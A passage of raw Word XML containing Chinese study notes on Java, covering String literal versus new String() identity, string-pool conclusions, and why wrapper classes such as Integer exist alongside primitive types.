          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String str2 = new String(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454EE67B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println(str1==str2); //false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EECDF23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60394C7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了两个引用。创建了两个对象。两个引用分别指向不同的两个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137F3D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A911FF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以上两段代码说明，只要是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来新建对象的，都会在堆中创建，而且其字符串是单独存值的，即使与栈中的数据相同，也不会与栈中的数据共享。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8449C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0F4B96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>结论与建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D3695F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:t>我们在使用诸如</w:t>
      </w:r>
      <w:r>
        <w:t>String str = “abc”</w:t>
      </w:r>
      <w:r>
        <w:t>；的格式定义类时，总是想当然地认为，我们创建了</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类的对象</w:t>
      </w:r>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:t>。担心陷阱！对象可能并没有被创建！唯一可以肯定的是，指向</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类的引用被创建了。至于这个引用到底是否指向了一个新的对象，必须根据上下文来考虑，除非你通过</w:t>
      </w:r>
      <w:r>
        <w:t>new()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来显要地创建一个新的对象。因此，更为准确的说法是，我们创建了一个指向</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类的对象的引用变量</w:t>
      </w:r>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:t>，这个对象引用变量指向了某个值为</w:t>
      </w:r>
      <w:r>
        <w:t>"abc"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类。清醒地认识到这一点对排除程序中难以发现的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>是很有帮助的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E3DF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1C58D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>String str = “abc”</w:t>
      </w:r>
      <w:r>
        <w:t>；的方式，可以在一定程度上提高程序的运行速度，因为</w:t>
      </w:r>
      <w:r>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:t>会自动根据栈中数据的实际情况来决定是否有必要创建新对象。而对于</w:t>
      </w:r>
      <w:r>
        <w:t>String str = new String(“abc”)</w:t>
      </w:r>
      <w:r>
        <w:t>；的代码，则一概在堆中创建新对象，而不管其字符串值是否相等，是否有必要创建新对象，从而加重了程序的负担。这个思想应该是享元模式的思想，但</w:t>
      </w:r>
      <w:r>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:t>的内部在这里实现是否应用了这个模式，不得而知。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8912B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019FAB75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:t>当比较包装类里面的数值是否相等时，用</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法；当测试两个包装类的引用是否指向同一个对象时，用</w:t>
      </w:r>
      <w:r>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65816B16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F6250E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>immutable</w:t>
      </w:r>
      <w:r>
        <w:t>性质，当</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>变量需要经常变换其值时，应该考虑使用</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>类，以提高程序效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF844E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6878424F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么有了基本类型还需要包装类型？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894BC38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05A349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId218" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/weixin_44355549/article/details/108228516</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C55F36C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18685027" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>基本类型</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>包装器类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D79A71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4CDCB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BAF453" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BEA51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75992148" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Short</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9EAAAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7805F79F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F993FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Double</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF02E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410E9E39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1、为什么存在这两种类型呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8CFCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A8657A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>我们都知道在</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>语言中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象存储在堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>里，我们通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>栈中的引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来使用这些对象</w:t>
      </w:r>
      <w:r>
        <w:t>；但是对于经常用到的一系列类型如</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>，如果我们用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>将其存储在堆里就不是很有效</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>特别是简单的小的变量。所以就出现了基本类型，同</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>采用了相似的做法，对于这些类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字来创建</w:t>
      </w:r>
      <w:r>
        <w:t>，而是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>直接将变量的值存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中，因此更加高效</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749E525" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E87E88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2、有了基本类型为什么还要有包装类型呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AE2D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25EC9411" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>我们知道</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>是一个面相对象的编程语言，基本类型并不具有对象的性质，为了让基本类型也具有对象的特征，就出现了包装类型（如我们在使用集合类型</w:t>
      </w:r>
      <w:r>
        <w:t>Collection</w:t>
      </w:r>
      <w:r>
        <w:t>时就一定要使用包装类型而非基本类型），它相当于将基本类型</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包装起来</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，使得它具有了对象的性质，并且为其添加了属性和方法，丰富了基本类型的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF91ABA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12834783" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>另外，当需要往</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中放东西时，像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这种基本类型是放不进去的，因为容器都是装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的，这是就需要这些基本类型的包装器类了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515B1C78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3、二者相互转换：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60040E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>int转Integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11886C79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>int i = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B61A33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Integer ii = new Integer(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A17F1DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Integer转int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A6953C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Integer ii = new Integer(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B7F27E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>int i = ii.intValue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DEA17E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4、二者的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE630D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FEBBE27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>声明方式不同：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EAE484" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>基本类型不使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>包装类型</w:t>
      </w:r>
      <w:r>
        <w:t>需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来在堆中分配存储空间；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D69A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DB135E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>存储方式及位置不同：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682E5F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>基本类型是直接将变量值存储在栈中</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>包装类型是将对象放在堆中，然后通过引用来使用</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD5FB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
